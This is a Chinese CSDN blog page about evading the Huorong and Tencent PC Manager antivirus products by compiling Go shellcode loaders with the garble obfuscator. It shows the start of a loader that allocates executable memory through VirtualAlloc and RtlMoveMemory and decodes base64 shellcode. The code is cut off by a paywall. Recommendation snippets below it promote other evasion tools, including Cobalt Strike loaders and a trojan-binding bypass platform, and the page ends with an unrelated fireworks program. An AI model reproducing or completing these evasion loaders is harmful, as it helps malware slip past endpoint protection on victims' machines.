golang任意代码免杀绕过火绒+电脑管家

最新推荐文章于 2024-05-14 09:07:49 发布
最新推荐文章于 2024-05-14 09:07:49 发布
阅读量1k 收藏 3
点赞数 3
文章标签: golang 火绒安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79571829/article/details/132619269
版权

火绒和电脑管家主要以静态规则为主,但是有时候静态杀起来也挺让人奔溃的,这边分享一下如何拿捏火绒和电脑管家

本文主要介绍如何通过garble进行混淆编译来绕过火绒,garble也可以绕过其他杀软,但是对火绒和电脑管家特别有效果,以火绒为例 下面来对比一下golang原生和garble混淆编译后得差距

来一个很原始的的shellcode loader代码,将原始shellcode base64后就进行加载执行

shellcode loader代码

package main

import (
	"encoding/base64"
	"log"
	"syscall"
	"time"
	"unsafe"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlMoveMemory")
)

func main() {
	b64shellcode:="b64shellcode"
	shellcode, err := base64.Std
最低0.47元/天 解锁文章
实战攻防安全
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
免杀方法(五)golang加载器cobaltstrike shellcode
qq_56426046的博客
10-04 1900
Go语言目前是最火的编程语言之一,使用go语言编写的加载器,运行shellcode 可以过国内主流杀软,例如360安全卫士、360安全杀毒、火绒、瑞星、金山、 电脑管家免杀效果很好。而且操作免杀的步骤简单。 项目地址https:/github.com/jax777/shellcode-launch Go语言编译器下载https:/studygolang.com/dlDownloads - The Go Programming Language安装go,下载安装包,傻瓜安装即可。解压下载的项目压缩包,新建6
Go语言垃圾回收(Garbage Collection)
博客
01-03 567
C语言的垃圾回收 这里介绍 Mark-And-Sweep Collection (McCarthy, 1960) 如下图,红色表示需要回收的,也被叫做non-reachable。绿色的node表示在heap外的指针 接下来是Mark的部分,每个block留出一个bit。见下图 下面是具体的算法: Mark & Sweep ...
2024年Go最新GoPass系列免杀基础(一)_go语言免杀Golang框架体系架构的知识
2401_84910977的博客
05-11 1034
前提 Shellcode 已测试过单独运行不被拦截,那么现在需要排查的这个加密是不是太过简单,而且这样需要考虑到,大批量用户使用时,很多十六进制都是固定的,那么也会被特征标记,如果全家桶拦了,相信你也可以动手改一改,你可以将 ascii 码加上一个数如 252+200=457,载入时,再减去。而且每个十六进制占一位,并且自己有位置编号,可以将他们提出来总结,并且 ascii 编码(\xfc为252 \xbb为187 \xaa为170),这样我们有 ascii 码,有数量,有位置,就可以还原回去。
2020.04-远控免杀从入门到实践(7)-代码篇-Golang+Ruby1
08-03
2020.04-远控免杀从入门到实践(7)-代码篇-Golang+Ruby1
通过包装Go工具链来混淆Go代码-Golang开发
05-26
通过包装Go工具链来混淆Go代码乱码GO111MODULE = on go获取mvdan.cc/garble通过包装Go工具链来混淆Go代码。 需要Go 1.16或更高版本。 garble build [build flags] [packages]该工具还支持garble test,以使用混淆后的代码运行测试,而garble反向则可对诸如堆栈跟踪之类的文本进行反混淆处理。 有关最新用法信息,请参见garble -h。 目的生成一个与常规版本一样工作的二进制文件,但是其有关原始源代码的信息越少越好。 该工具是
Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式
程序员阿飘 的博客
04-07 286
第一个文件选择木马(木马.exe),第二个文件选择要捆绑的文件(如pdf等)点击生成目前火绒、360、卡巴斯基、def全过;先这样用,不能bypass了再说,更新频率看star数量。
简单免杀绕过和利用上线的 GoCS
Karka_的博客
12-28 981
第一次编写插件和编写 js 文件,无疑是一次面向百度的编程,总体还是不错,学到了很多。遗憾的是 asp 并没有免杀,还希望会 asp 的师傅指导一下。这个版本很基础,很简单进行利用,所以只能在简单环境下利用,希望后面能加入更多的元素,让这个插件适应更多复杂环境。第一次编写插件和编写 js 文件,无疑是一次面向百度的编程,总体还是不错,学到了很多。遗憾的是 asp 并没有免杀,还希望会 asp 的师傅指导一下。
golang测试代码,简单串口服务测试
07-22
在IT行业中,Go语言Golang)是一种广泛用于构建高效、可扩展的网络服务和工具的语言。本项目涉及的是一个Golang实现的串口服务测试,主要关注的是如何使用Go进行串口通信以及进行测试。串口通信是计算机通信的一种...
代码生成 内容生成 golang代码生成
01-03
本项目专注于Golang语言代码生成,特别适用于基于MySQL数据库的项目。以下是关于这个主题的详细知识: 1. **代码生成的概念**:代码生成是指通过自动化工具或框架,根据预定义的模板或元数据自动生成源代码的过程...
go-packer:golang打包二进制进行免杀
04-07
【标题】:“go-packer:使用Golang打包二进制以实现免杀功能” 在网络安全领域,免杀技术是开发者为了防止恶意软件检测而采取的一种策略。Go-packer是一个用Go语言编写的工具,它的主要目标是将Golang编译的二进制...
数学建模常用算法库代码(python+golang
03-14
方便大家进行数学建模减少代码量 软件架构 python库 安装教程 找到sitepackage拖进去 使用说明 用到ray库加速可能需要安装一下 有些的引用其实还得完善一下,最好可能还是复制后修改代码 参与贡献 "熵权法:...
lcx._g go语言写的lcx 过杀软
11-16
lcx._g go语言写的lcx.exe 免杀 过杀软 360
go语言工具类
01-23
总结的go语言的工具类,包括json,xml,redis,memcache等的用法,配置的解析等
golang开启mod后import报红解决
11-07
golang开启mod后import报红解决 创建过程有问题导致 注意创建完成时 创建go mod 解决无法找到go mod问题
garble:混淆Go构建
03-29
断章取义 GO111MODULE=on go get mvdan.cc/garble 通过包装Go工具链来混淆Go代码。 需要Go 1.16或更高版本。 garble build [build flags] [packages] 有关最新用法信息,请参见garble -h 。 目的 生成一个与常规版本一样工作的二进制文件,但其中包含的有关原始源代码的信息越少越好。 该工具旨在: 与cmd/go结合使用,以支持模块和构建缓存 给定相同的初始源代码,确定性和可重现性 在给定原始来源的情况下可逆,以消除混淆的恐慌痕迹 机制 该工具将对Go编译器和链接器的调用包装起来,以转换Go构建,以便: 用短的base64散列替换尽可能多的有用标识符 用较短的base64散列替换程序包路径 删除所有和信息 删除文件名和随机播放位置信息 剥离调试信息和符号表 如果给定了-literals标志,则对文字进
记一次绕过火绒安全提权实战案例
渗透测试研究中心
01-24 1829
0x01 前言朋友发来一个站让帮看下提权,服务器上安装的有护卫神+火绒+安全狗等安全防护软件,看着确实挺唬人,他也试了不少常用提权EXP,结果都失败了,可能是欠缺免杀EXP能力吧,当然也有可能是修复了这些漏洞,抽空给他看了下并写了这篇记录文章。在拿到权限后用中国菜刀连了下,不过好像被拦截了,提示:服务器返回无效或不可识别的响应,以前也多次遇到这种情况,这里只要换成Godzilla就能正常连接了。...
2024年Go最新插件分享 简单免杀绕过和利用上线的 GoCS_如何做到插件反被杀,2024年网易Golang岗面试必问
最新发布
2401_84924979的博客
05-14 440
/layui的监听事件和原生select不一样。//select监听事件开始。//select监听事件结束。//构造Gexp类结束。
一款免杀框架 -- AniYa​
m0_60571990的博客
01-03 886
一款免杀框架 -- AniYa​
go混淆实现bypassAV(cobaltstrike免杀
qq_32445755的博客
02-09 916
近两年随着hw和红蓝对抗的增多,接触到的提权、内网渗透、域渗透也越来越多。攻击能力有没有提升不知道,但防护水平明显感觉提升了一大截,先不说防护人员的技术水平如果,最起码各种云WAF、防火墙、隔离设备部署的多了,服务器上也经常能见到安装了杀软、软waf、agent等等,特别是某数字杀软在国内服务器上尤为普及。这个时候,不会点免杀技术就非常吃亏了。
golang烟花代码
04-11
Golang烟花代码是一种使用Go语言编写的模拟烟花爆炸效果的程序。它通过使用Golang的图形库和并发机制,实现了烟花在屏幕上绽放的效果。 以下是一个简单的Golang烟花代码示例: ```go package main import ( "fmt" "math/rand" "time" "github.com/fogleman/gg" ) const ( width = 800 height = 600 ) type Particle struct { X, Y float64 VX, VY float64 Life int Color string Sparkles []Sparkle } type Sparkle struct { X, Y float64 VX, VY float64 Life int Color string } func main() { dc := gg.NewContext(width, height) dc.SetRGB(0, 0, 0) dc.Clear() particles := make([]Particle, 0) for i := 0; i < 100; i++ { p := Particle{ X: width / 2, Y: height, VX: rand.Float64()*6 - 3, VY: -rand.Float64()*5 - 5, Life: rand.Intn(60) + 60, Color: fmt.Sprintf("#%06x", rand.Intn(0xffffff)), } particles = append(particles, p) } for len(particles) > 0 { dc.Clear() for i := len(particles) - 1; i >= 0; i-- { p := &particles[i] dc.SetRGB255(parseColor(p.Color)) dc.DrawPoint(p.X, p.Y, 1) p.X += p.VX p.Y += p.VY p.VY += 0.1 p.Life-- if p.Life <= 0 { particles = append(particles[:i], particles[i+1:]...) continue } for j := len(p.Sparkles) - 1; j >= 0; j-- { s := &p.Sparkles[j] dc.SetRGB255(parseColor(s.Color)) dc.DrawPoint(s.X, s.Y, 1) s.X += s.VX s.Y += s.VY s.VY += 0.1 s.Life-- if s.Life <= 0 { p.Sparkles = append(p.Sparkles[:j], p.Sparkles[j+1:]...) } } if rand.Float64() < 0.02 { s := Sparkle{ X: p.X, Y: p.Y, VX: rand.Float64()*6 - 3, VY: rand.Float64()*6 - 3, Life: rand.Intn(20) + 20, Color: fmt.Sprintf("#%06x", rand.Intn(0xffffff)), } p.Sparkles = append(p.Sparkles, s) } } dc.Stroke() dc.SavePNG("fireworks.png") time.Sleep(time.Millisecond * 10) } } func parseColor(color string) (int, int, int) { var r, g, b int fmt.Sscanf(color, "#%02x%02x%02x", &r, &g, &b) return r, g, b } ``` 这段代码使用了第三方库`github.com/fogleman/gg`来进行图形绘制。它模拟了烟花的爆炸效果,通过不断更新粒子的位置和颜色,实现了烟花在屏幕上绽放的效果。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值